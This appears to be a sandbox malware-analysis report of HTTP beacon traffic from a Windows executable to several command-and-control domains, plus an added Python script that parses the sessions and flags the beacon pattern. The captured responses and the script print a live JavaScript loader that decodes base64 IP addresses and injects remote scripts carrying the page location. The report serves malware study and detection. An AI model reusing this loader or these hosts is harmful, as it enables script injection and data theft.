                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 4e 28 63 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 76 61 72 20 73 74 72 55 3d 61 74 6f 62 28 63 29 2b 22 2f 22 2b 62 74 6f 61 28 22 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 2b 27 2e 6a 73 27 3b 61 2e 73 72 63 3d 73 74 72 55 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 4e 28 22 61 48 52 30 63 48 4d 36 4c 79 38 78 4f 54 51 75 4d 54 51 33 4c 6a 6b 35 4c 6a 49 30 4e 54 6f 78 4d 54 63 78 4f 41 3d 3d 22 29 3b 4e 28 22 61 48 52 30 63 [TRUNCATED]
Data Ascii: <html><head></head><body><script type="text/javascript">function N(c){var a=document.createElement("script");var strU=atob(c)+"/"+btoa("u="+window.location+"&p="+window.location.pathname+window.location.search)+'.js';a.src=strU;document.getElementsByTagName("body")[0].appendChild(a)}N("aHR0cHM6Ly8xOTQuMTQ3Ljk5LjI0NToxMTcxOA==");N("aHR0cHM6Ly8xNTYuMjI3LjEuODQ6NTExOA==");</script></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49970 | 13.248.169.48 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe |

Timestamp: Jan 10, 2025 19:46:41.286834002 CET | Bytes transferred: 743 | Direction: OUT
POST /09b7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.hsa.world
Origin: http://www.hsa.world
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.hsa.world/09b7/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 45 59 61 68 58 4b 42 4a 71 55 52 54 36 4a 52 45 39 56 50 79 44 41 33 6d 79 39 33 45 44 2f 59 45 4c 6c 34 36 35 4d 43 48 32 39 6a 57 57 66 46 5a 78 48 64 76 44 76 71 58 64 4c 38 51 6b 4f 6c 58 43 38 2b 34 4a 4a 75 71 46 35 6e 63 77 39 65 73 4b 57 51 4c 71 72 30 63 76 6c 6a 72 6f 36 66 6a 62 69 41 59 4e 42 6a 4d 49 57 50 76 44 68 4d 61 37 53 30 66 37 67 62 45 6f 6e 6e 49 59 53 59 56 32 6c 54 42 7a 62 79 55 33 76 58 31 74 54 62 4e 53 4f 62 53 4f 32 79 69 34 4c 63 73 72 47 67 53 6e 7a 58 70 76 45 32 4f 59 41 54 31 78 69 4c 6f 64 49 58 57 77 3d 3d
Data Ascii: EzZ=9RL4JHol/lViFEYahXKBJqURT6JRE9VPyDA3my93ED/YELl465MCH29jWWfFZxHdvDvqXdL8QkOlXC8+4JJuqF5ncw9esKWQLqr0cvljro6fjbiAYNBjMIWPvDhMa7S0f7gbEonnIYSYV2lTBzbyU3vX1tTbNSObSO2yi4LcsrGgSnzXpvE2OYAT1xiLodIXWw==

Timestamp: Jan 10, 2025 19:46:41.772420883 CET | Bytes transferred: 73 | Direction: IN
HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close
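Sessions 0 and 1 show the two request shapes the sample uses: a GET whose query string carries one long base64 parameter plus one short alphanumeric one, and a POST whose form body carries a single long base64 field, both aimed at a four-character directory and both sent with an Android browser User-Agent by a Windows executable under Program Files (x86). Note that the '+', '/' and '=' characters in the values are not percent-encoded even though the POST declares application/x-www-form-urlencoded. The 200 response in session 0 is a small HTML page that base64-decodes two strings and loads a script from each. The code below is an added example for this report page, not Joe Sandbox code: the request, body and HTML strings are copied from sessions 0 and 1 above (constructed test input, not a live capture), the desktop-browser control request is made up, and the rule in looks_like_beacon() is this example's own reading of the traffic shape, not a vendor signature.

```python
"""Parse and triage the HTTP sessions shown above.

Added example for this report page; not Joe Sandbox code.  SESSION_0_GET,
SESSION_0_HTML and SESSION_1_POST are copied from the report (constructed
test input), BENIGN_GET is made up, and looks_like_beacon() is this
example's own heuristic rather than a published signature.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List

# Originating process and User-Agent, from the session headers above.
PROCESS = r"C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe"
UA = ("Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) "
      "AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36")

# Session 0: GET to www.jgkgf.club and the HTML it received.
SESSION_0_GET = (
    "GET /tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en\r\nHost: www.jgkgf.club\r\nConnection: close\r\n"
    f"User-Agent: {UA}\r\n\r\n"
)
SESSION_0_HTML = ('<html><head></head><body><script type="text/javascript">function N(c){var a=document.createElement("script");'
                  'var strU=atob(c)+"/"+btoa("u="+window.location+"&p="+window.location.pathname+window.location.search)+\'.js\';'
                  'a.src=strU;document.getElementsByTagName("body")[0].appendChild(a)}'
                  'N("aHR0cHM6Ly8xOTQuMTQ3Ljk5LjI0NToxMTcxOA==");N("aHR0cHM6Ly8xNTYuMjI3LjEuODQ6NTExOA==");</script></body></html>')

# Session 1: POST to www.hsa.world (answered 405).
SESSION_1_POST = (
    "POST /09b7/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en\r\n"
    "Host: www.hsa.world\r\nOrigin: http://www.hsa.world\r\n"
    "Content-Length: 200\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "Cache-Control: no-cache\r\nConnection: close\r\nReferer: http://www.hsa.world/09b7/\r\n"
    f"User-Agent: {UA}\r\n\r\n"
    "EzZ=9RL4JHol/lViFEYahXKBJqURT6JRE9VPyDA3my93ED/YELl465MCH29jWWfFZxHdvDvqXdL8QkOlXC8+4JJuqF5ncw9esKWQLqr0cvljro6fjbiAYNBjMIWPvDhMa7S0f7gbEonnIYSYV2lTBzbyU3vX1tTbNSObSO2yi4LcsrGgSnzXpvE2OYAT1xiLodIXWw=="
)
# Made-up control request from an ordinary desktop browser.
BENIGN_GET = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
              "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n\r\n")


@dataclass
class HttpRequest:
    method: str
    path: str
    query: Dict[str, str]
    headers: Dict[str, str]
    body: str


def split_form(s: str) -> Dict[str, str]:
    """Split 'k=v&k2=v2' on '&' and on the FIRST '=' only, with no URL-decoding.
    The captured values carry raw '+', '/' and '=' padding, so parse_qsl()
    would turn every '+' into a space and corrupt the base64."""
    out: Dict[str, str] = {}
    for part in filter(None, s.split("&")):
        key, _, value = part.partition("=")
        out[key] = value
    return out


def parse_request(raw: str) -> HttpRequest:
    """Minimal HTTP/1.x request parser: request line, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, qs = target.partition("?")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, split_form(qs), headers, body)


def is_base64(value: str, min_len: int = 64) -> bool:
    """True for a well-formed base64 blob at least min_len characters long."""
    if len(value) < min_len or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


SHORT_DIR = re.compile(r"^/[0-9a-z]{4}/$")


def looks_like_beacon(req: HttpRequest, process_path: str) -> bool:
    """Traffic shape seen in the sessions above (this example's own rule):
    a four-character directory, exactly one large base64 parameter in the
    query (GET) or form body (POST), and an Android browser User-Agent
    emitted by a Windows executable."""
    if not SHORT_DIR.match(req.path):
        return False
    params = req.query if req.method == "GET" else split_form(req.body)
    if sum(is_base64(v) for v in params.values()) != 1:
        return False
    return "Android" in req.headers.get("user-agent", "") and process_path.lower().endswith(".exe")


def body_matches_content_length(req: HttpRequest) -> bool:
    """Declared Content-Length versus bytes actually sent."""
    declared = req.headers.get("content-length")
    return declared is not None and int(declared) == len(req.body.encode())


LOADER_CALL = re.compile(r'N\("([A-Za-z0-9+/=]+)"\)')


def decode_loader_urls(html: str) -> List[str]:
    """Recover the URLs the returned page hands to atob() before loading a script from each."""
    return [base64.b64decode(b).decode() for b in LOADER_CALL.findall(html)]


if __name__ == "__main__":
    for name, raw in (("session 0", SESSION_0_GET), ("session 1", SESSION_1_POST), ("control", BENIGN_GET)):
        r = parse_request(raw)
        print(f"{name}: {r.method} {r.headers.get('host')}{r.path} beacon={looks_like_beacon(r, PROCESS)}")
    print("loader URLs:", decode_loader_urls(SESSION_0_HTML))
```

The parser deliberately avoids urllib's parse_qsl: because the sample does not percent-encode its payload, a standard form parser would replace each '+' with a space and the base64 would no longer decode. The User-Agent check only carries weight because the session header tells us which process sent the request; an Android browser string from a Windows PE is the point, not the string on its own.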


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49987 | 13.248.169.48 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe |

Timestamp: Jan 10, 2025 19:46:43.835413933 CET | Bytes transferred: 763 | Direction: OUT
POST /09b7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.hsa.world
Origin: http://www.hsa.world
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.hsa.world/09b7/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 6e 41 61 6a 30 69 42 4d 4b 55 57 50 4b 4a 52 4f 64 56 4c 79 43 38 33 6d 7a 49 36 46 78 4c 59 46 71 56 34 6f 4d 34 43 4b 57 39 6a 64 32 66 4d 55 52 48 57 76 44 72 55 58 59 72 38 51 67 65 6c 58 41 30 2b 34 36 68 74 72 56 35 6c 46 67 39 63 68 71 57 51 4c 71 72 30 63 73 5a 46 72 72 4b 66 6a 71 53 41 4b 2b 5a 6b 50 49 57 4f 34 7a 68 4d 65 37 53 34 66 37 68 4d 45 70 71 49 49 61 36 59 56 33 56 54 42 68 7a 78 42 6e 76 5a 72 64 53 65 64 41 2b 65 51 2f 4c 79 6d 37 6e 62 6d 4a 43 6c 61 42 2b 4e 34 65 6c 68 63 59 6b 67 6f 32 72 2f 6c 65 31 65 4e 31 31 75 66 6b 55 7a 30 42 66 31 38 49 67 61 72 74 76 55 4a 39 63 3d
Data Ascii: EzZ=9RL4JHol/lViFnAaj0iBMKUWPKJROdVLyC83mzI6FxLYFqV4oM4CKW9jd2fMURHWvDrUXYr8QgelXA0+46htrV5lFg9chqWQLqr0csZFrrKfjqSAK+ZkPIWO4zhMe7S4f7hMEpqIIa6YV3VTBhzxBnvZrdSedA+eQ/Lym7nbmJClaB+N4elhcYkgo2r/le1eN11ufkUz0Bf18IgartvUJ9c=


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.4 | 50003 | 13.248.169.48 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe |

Timestamp: Jan 10, 2025 19:46:46.381752968 CET | Bytes transferred: 10845 | Direction: OUT
POST /09b7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.hsa.world
Origin: http://www.hsa.world
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.hsa.world/09b7/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 6e 41 61 6a 30 69 42 4d 4b 55 57 50 4b 4a 52 4f 64 56 4c 79 43 38 33 6d 7a 49 36 46 78 7a 59 46 59 4e 34 35 66 51 43 4c 57 39 6a 51 57 66 42 55 52 48 4c 76 43 50 51 58 59 6d 42 51 69 57 6c 56 69 4d 2b 2b 4c 68 74 6c 56 35 6c 59 77 39 64 73 4b 58 45 4c 71 62 77 63 73 4a 46 72 72 4b 66 6a 70 4b 41 61 39 42 6b 43 6f 57 50 76 44 68 36 61 37 53 55 66 34 52 63 45 70 2b 69 49 4b 61 59 56 55 39 54 48 55 48 78 63 58 76 62 71 64 53 34 64 41 7a 4f 51 2b 6e 45 6d 36 54 39 6d 4c 65 6c 65 58 33 51 6f 66 67 37 46 62 38 62 2b 48 62 6b 6a 4e 4a 45 4c 32 41 62 62 6e 77 47 67 42 48 69 78 71 39 53 75 50 4f 56 58 37 39 6d 67 65 77 66 38 71 4f 50 75 68 77 78 69 54 7a 6b 4c 70 44 39 4b 41 71 66 37 62 4c 50 51 59 45 68 51 31 42 42 45 48 59 51 7a 56 74 7a 6a 4c 4e 4b 4d 32 62 41 4e 70 5a 67 69 69 48 54 36 31 50 51 6a 35 38 53 6d 48 56 66 49 59 36 76 31 31 42 38 58 38 4c 53 41 65 58 74 46 4b 61 63 61 41 67 52 61 65 6a 32 46 6f 53 2b 75 57 43 69 30 6d 52 4c 51 69 4d 6d 67 58 [TRUNCATED]
Data Ascii: EzZ=[TRUNCATED]

Timestamp: Jan 10, 2025 19:46:46.859031916 CET | Bytes transferred: 73 | Direction: IN
HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.4 | 50012 | 13.248.169.48 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe |

Timestamp: Jan 10, 2025 19:46:48.924024105 CET | Bytes transferred: 494 | Direction: OUT
GET /09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.hsa.world
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36

Timestamp: Jan 10, 2025 19:46:49.387398958 CET | Bytes transferred: 381 | Direction: IN
HTTP/1.1 200 OK
content-type: text/html
date: Fri, 10 Jan 2025 18:46:49 GMT
content-length: 260
connection: close
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 7a 5a 3d 77 54 6a 59 4b 79 34 5a 31 6e 68 79 4e 55 59 72 67 58 57 73 4b 4a 59 58 52 70 45 73 44 74 35 33 31 32 34 53 31 41 73 74 49 41 50 4f 47 73 4e 33 31 63 39 54 4b 31 5a 30 54 47 44 72 50 43 62 53 6c 46 2f 68 66 4b 65 47 61 43 58 47 64 43 30 58 6b 4d 78 49 30 48 5a 6d 56 77 64 69 70 4f 54 7a 42 50 4c 51 41 65 52 4b 6d 6f 57 57 72 4f 4b 61 56 63 4a 49 5a 73 6f 3d 26 42 6a 52 78 62 3d 38 72 37 30 66 68 51 78 64 4e 34 6c 52 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB"}</script></head></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.2.4 | 50013 | 156.253.8.115 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe |

Timestamp: Jan 10, 2025 19:46:54.468764067 CET | Bytes transferred: 752 | Direction: OUT
POST /6t0f/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.sssvip2.shop
Origin: http://www.sssvip2.shop
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.sssvip2.shop/6t0f/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 42 61 55 32 4b 42 56 4f 30 6b 66 45 66 41 52 74 4e 70 4d 4e 39 66 56 39 77 52 74 70 38 73 44 4e 45 72 4a 66 44 4f 35 4f 68 36 78 39 4b 42 58 6f 33 4e 71 2f 4b 6a 62 66 38 4a 74 5a 67 49 2b 6a 74 49 41 44 4b 6a 49 63 34 58 6f 69 44 4f 75 65 74 48 50 6a 41 71 59 53 47 46 77 43 36 30 41 33 55 6f 59 67 66 39 66 36 74 70 45 70 69 76 76 42 71 36 73 72 64 77 44 47 53 65 43 44 65 36 49 4f 54 57 76 51 37 75 64 36 48 2f 4b 5a 42 59 6f 70 32 30 72 78 77 2f 4a 59 2b 67 43 38 76 64 50 59 7a 49 43 6c 56 69 7a 6a 32 77 4f 46 4c 4c 35 78 6c 34 79 70 59 78 4b 71 43 35 67 76 35 4b 75 4b 76 77 3d 3d
Data Ascii: EzZ=BaU2KBVO0kfEfARtNpMN9fV9wRtp8sDNErJfDO5Oh6x9KBXo3Nq/Kjbf8JtZgI+jtIADKjIc4XoiDOuetHPjAqYSGFwC60A3UoYgf9f6tpEpivvBq6srdwDGSeCDe6IOTWvQ7ud6H/KZBYop20rxw/JY+gC8vdPYzIClVizj2wOFLL5xl4ypYxKqC5gv5KuKvw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 50014 | 156.253.8.115 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:46:57.022177935 CET | 772 | OUT | POST /6t0f/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.sssvip2.shop
Origin: http://www.sssvip2.shop
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.sssvip2.shop/6t0f/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 45 7a 5a 3d 42 61 55 32 4b 42 56 4f 30 6b 66 45 66 6a 5a 74 64 36 55 4e 38 2f 56 36 7a 52 74 70 72 38 44 42 45 72 56 66 44 50 4d 52 67 4a 56 39 4b 6c 48 6f 32 50 53 2f 50 6a 62 66 6b 35 74 51 6b 49 2b 71 74 49 4e 32 4b 6d 6f 63 34 54 41 69 44 50 65 65 71 77 37 67 53 4b 59 4d 4f 6c 77 41 6e 6b 41 33 55 6f 59 67 66 39 6a 55 74 6f 73 70 6a 66 66 42 71 62 73 6b 51 51 44 42 43 4f 43 44 61 36 49 4b 54 57 76 79 37 73 34 76 48 38 79 5a 42 5a 59 70 78 6d 44 79 6e 50 4a 65 36 67 44 70 6c 34 6d 30 30 4b 6a 62 4b 42 72 55 78 6a 71 66 44 74 30 72 30 4a 54 2b 4b 78 75 5a 66 2b 70 62 30 4a 54 44 30 36 65 45 56 73 33 65 66 75 36 56 4d 2b 69 36 46 5a 4b 61 76 31 6f 3d
Data Ascii: EzZ=BaU2KBVO0kfEfjZtd6UN8/V6zRtpr8DBErVfDPMRgJV9KlHo2PS/Pjbfk5tQkI+qtIN2Kmoc4TAiDPeeqw7gSKYMOlwAnkA3UoYgf9jUtospjffBqbskQQDBCOCDa6IKTWvy7s4vH8yZBZYpxmDynPJe6gDpl4m00KjbKBrUxjqfDt0r0JT+KxuZf+pb0JTD06eEVs3efu6VM+i6FZKav1o=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 50015 | 156.253.8.115 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:46:59.568818092 CET | 10854 | OUT | POST /6t0f/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.sssvip2.shop
Origin: http://www.sssvip2.shop
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.sssvip2.shop/6t0f/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 45 7a 5a 3d 42 61 55 32 4b 42 56 4f 30 6b 66 45 66 6a 5a 74 64 36 55 4e 38 2f 56 36 7a 52 74 70 72 38 44 42 45 72 56 66 44 50 4d 52 67 4a 64 39 4b 53 76 6f 33 75 53 2f 4d 6a 62 66 36 4a 74 56 6b 49 2f 36 74 49 6c 79 4b 6d 31 6a 34 52 49 69 43 70 4b 65 76 43 54 67 59 4b 59 4d 52 31 77 4e 36 30 41 75 55 73 30 6b 66 39 54 55 74 6f 73 70 6a 64 48 42 6f 4b 73 6b 44 67 44 47 53 65 43 50 65 36 49 79 54 57 47 46 37 73 39 55 48 4d 53 5a 41 35 49 70 33 53 6a 79 6c 76 4a 63 39 67 43 71 6c 34 69 72 30 4b 4f 71 4b 43 32 44 78 67 32 66 48 37 31 41 74 5a 62 78 57 44 75 51 4d 66 78 73 7a 35 58 65 30 72 32 54 46 63 76 55 45 50 6e 69 47 39 62 32 51 70 36 5a 36 42 72 37 6a 4a 49 55 2b 4d 35 71 4a 75 56 48 51 67 51 47 76 72 4f 61 31 6f 71 6b 54 51 53 6c 56 62 35 57 54 65 36 71 6f 72 4a 4a 31 30 59 51 50 50 39 53 78 65 71 50 33 2b 4f 68 65 71 37 33 53 4b 76 65 6f 56 74 32 4c 53 71 39 79 73 74 4a 4e 56 46 68 36 6b 59 52 4c 55 6b 51 6f 37 41 35 37 6e 45 68 4f 58 39 6e 4b 55 43 78 46 46 35 6a 6c 30 6c 42 6d 4d 48 57 31 46 [TRUNCATED]
Data Ascii: EzZ=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 50016 | 156.253.8.115 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:47:02.111824036 CET | 497 | OUT | GET /6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.sssvip2.shop
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 50017 | 37.97.254.27 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:47:28.590451956 CET | 779 | OUT | POST /7ujc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.dutchdubliners.online
Origin: http://www.dutchdubliners.online
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.dutchdubliners.online/7ujc/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 45 7a 5a 3d 62 74 71 41 35 2b 58 67 44 58 6e 75 2f 77 63 76 7a 46 57 53 33 73 6e 55 39 70 79 79 38 6f 41 31 42 4a 75 6c 6a 76 4a 34 56 36 6f 63 68 64 69 6c 56 57 6d 65 4b 30 56 43 34 36 54 37 73 34 30 6f 5a 2b 49 54 31 69 47 6c 38 6a 37 76 49 44 58 7a 41 6d 75 6d 6d 70 71 6a 4b 73 66 6a 58 39 52 44 6c 4b 32 2f 66 77 49 4b 44 79 53 64 58 74 74 4a 2b 32 33 45 41 4a 68 6e 46 7a 4e 65 39 55 6b 78 41 49 31 4e 68 56 55 70 44 73 70 31 48 6c 79 6e 43 75 46 31 75 53 32 6b 30 66 63 53 36 42 56 58 2b 43 56 6d 45 30 73 72 38 6c 7a 44 6c 6d 55 61 54 61 64 6e 32 71 37 5a 49 50 69 32 47 6e 30 50 64 51 3d 3d
